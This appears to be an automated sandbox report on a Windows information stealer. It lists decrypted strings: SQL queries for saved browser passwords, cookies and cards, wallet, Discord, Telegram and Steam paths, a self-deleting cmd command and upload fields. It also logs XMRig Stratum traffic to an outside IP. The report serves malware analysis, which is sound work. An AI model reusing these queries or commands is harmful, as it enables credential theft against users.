Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GdiplusStartup
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GdiplusShutdown
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GdipSaveImageToStream
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GdipDisposeImage
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GdipFree
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetHGlobalFromStream
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: CreateStreamOnHGlobal
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: CoUninitialize
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: CoInitialize
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: CoCreateInstance
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: BCryptDecrypt
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: BCryptSetProperty
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: BCryptDestroyKey
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetWindowRect
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetDesktopWindow
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetDC
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: CloseWindow
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: wsprintfA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: EnumDisplayDevicesA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetKeyboardLayoutList
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: CharToOemW
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: wsprintfW
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: RegQueryValueExA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: RegEnumKeyExA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: RegOpenKeyExA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: RegCloseKey
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: RegEnumValueA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: CryptBinaryToStringA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: CryptUnprotectData
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: SHGetFolderPathA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: ShellExecuteExA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: InternetOpenUrlA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: InternetConnectA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: InternetCloseHandle
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: InternetOpenA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: HttpSendRequestA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: HttpOpenRequestA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: InternetReadFile
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: InternetCrackUrlA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: StrCmpCA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: StrStrA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: StrCmpCW
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: PathMatchSpecA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: GetModuleFileNameExA
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: RmStartSession
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: RmRegisterResources
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: RmGetList
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: RmEndSession
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: sqlite3_open
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: sqlite3_prepare_v2
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: sqlite3_step
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: sqlite3_column_text
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: sqlite3_finalize
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: sqlite3_close
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: sqlite3_column_bytes
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: sqlite3_column_blob
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: encrypted_key
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: PATH
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: NSS_Init
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: NSS_Shutdown
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: PK11_FreeSlot
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: PK11_Authenticate
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: PK11SDR_Decrypt
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: C:\ProgramData\
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: browser:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: profile:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: url:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: login:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: password:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Opera
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: OperaGX
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Network
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: cookies
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: .txt
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: TRUE
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: FALSE
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: autofill
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: SELECT name, value FROM autofill
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: history
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: name:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: month:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: year:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: card:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Cookies
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Login Data
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Web Data
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: History
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: logins.json
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: formSubmitURL
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: usernameField
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: encryptedUsername
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: encryptedPassword
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: guid
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: cookies.sqlite
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: formhistory.sqlite
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: places.sqlite
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: plugins
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Local Extension Settings
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Sync Extension Settings
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: IndexedDB
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Opera Stable
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Opera GX Stable
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: CURRENT
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: chrome-extension_
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: _0.indexeddb.leveldb
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Local State
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: profiles.ini
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: chrome
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: opera
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: firefox
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: wallets
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: %08lX%04lX%lu
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: ProductName
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: ProcessorNameString
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: DisplayName
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: DisplayVersion
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Network Info:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: - IP: IP?
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: - Country: ISO?
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: System Summary:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: - HWID:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: - OS:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: - Architecture:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: - UserName:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: - Computer Name:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: - Local Time:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: - UTC:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: - Language:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: - Keyboards:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: - Laptop:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: - Running Path:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: - CPU:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: - Threads:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: - Cores:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: - RAM:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: - Display Resolution:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: - GPU:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: User Agents:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Installed Apps:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: All Users:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Current User:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Process List:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: system_info.txt
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: freebl3.dll
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: mozglue.dll
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: msvcp140.dll
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: nss3.dll
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: softokn3.dll
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: vcruntime140.dll
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: \Temp\
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: .exe
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: runas
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: open
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: /c start
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: %DESKTOP%
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: %APPDATA%
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: %LOCALAPPDATA%
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: %USERPROFILE%
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: %DOCUMENTS%
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: %PROGRAMFILES%
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: %PROGRAMFILES_86%
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: %RECENT%
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: *.lnk
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: files
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: \discord\
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: \Local Storage\leveldb
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: \Telegram Desktop\
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: key_datas
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: D877F783D5D3EF8C*
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: map*
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: A7FDF864FBC10B77*
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: F8806DD0C461824F*
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Telegram
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: *.tox
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: *.ini
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Password
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: 00000001
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: 00000002
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: 00000003
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: 00000004
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: \Outlook\accounts.txt
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Pidgin
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: \.purple\
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: accounts.xml
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: dQw4w9WgXcQ
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: token:
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Software\Valve\Steam
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: SteamPath
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: \config\
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: ssfn*
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: config.vdf
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: DialogConfig.vdf
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: libraryfolders.vdf
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: loginusers.vdf
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: \Steam\
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: sqlite3.dll
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: browsers
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: done
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: soft
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: \Discord\tokens.txt
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: https
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: POST
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: HTTP/1.1
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: hwid
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: build
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: token
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: file_name
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: file
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: message
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	String decryptor: screenshot.jpg

Source: https://iplogger.co/1lLub

HTTP Parser: No favicon

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match

File source: dump.pcap, type: PCAP

Detected Stratum mining protocol

Source: global traffic

TCP traffic: 192.168.2.7:49892 -> 95.179.241.203:80 payload: data raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 36 76 72 41 68 37 6e 76 41 4b 43 41 75 69 65 74 72 77 69 6a 73 36 5a 36 61 36 73 4c 74 7a 65 43 42 62 71 67 72 4d 48 47 32 73 73 4a 7a 6d 57 48 57 4c 4b 6f 6b 36 55 6b 4d 78 62 55 50 78 73 66 75 51 41 31 71 78 51 68 42 42 42 79 67 79 31 42 64 38 76 6a 36 4e 7a 51 4d 57 65 68 33 51 22 2c 22 70 61 73 73 22 3a 22 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 31 39 2e 33 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 38 2e 30 20 6d 73 76 63 2f 32 30 32 32 22 2c 22 72 69 67 69 64 22 3a 22 22 2c 22 61 6c 67 6f 22 3a 5b 22 72 78 2f 30 22 2c 22 63 6e 2f 32 22 2c 22 63 6e 2f 72 22 2c 22 63 6e 2f 66 61 73 74 22 2c 22 63 6e 2f 68 61 6c 66 22 2c 22 63 6e 2f 78 61 6f 22 2c 22 63 6e 2f 72 74 6f 22 2c 22 63 6e 2f 72 77 7a 22 2c 22 63 6e 2f 7a 6c 73 22 2c 22 63 6e 2f 64 6f 75 62 6c 65 22 2c 22 63 6e 2f 63 63 78 22 2c 22 63 6e 2d 6c 69 74 65 2f 31 22 2c 22 63 6e 2d 68 65 61 76 79 2f 30 22 2c 22 63 6e 2d 68 65 61 76 79 2f 74 75 62 65 22 2c 22 63 6e 2d 68 65 61 76 79 2f 78 68 76 22 2c 22 63 6e 2d 70 69 63 6f 22 2c 22 63 6e 2d 70 69 63 6f 2f 74 6c 6f 22 2c 22 63 6e 2f 75 70 78 32 22 2c 22 63 6e 2f 67 70 75 22 2c 22 63 6e 2f 31 22 2c 22 72 78 2f 77 6f 77 22 2c 22 72 78 2f 61 72 71 22 2c 22 72 78 2f 67 72 61 66 74 22 2c 22 72 78 2f 73 66 78 22 2c 22 72 78 2f 6b 65 76 61 22 2c 22 70 61 6e 74 68 65 72 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 76 32 22 2c 22 61 72 67 6f 6e 32 2f 6e 69 6e 6a 61 22 2c 22 67 68 6f 73 74 72 69 64 65 72 22 5d 7d 7d 0a data ascii: 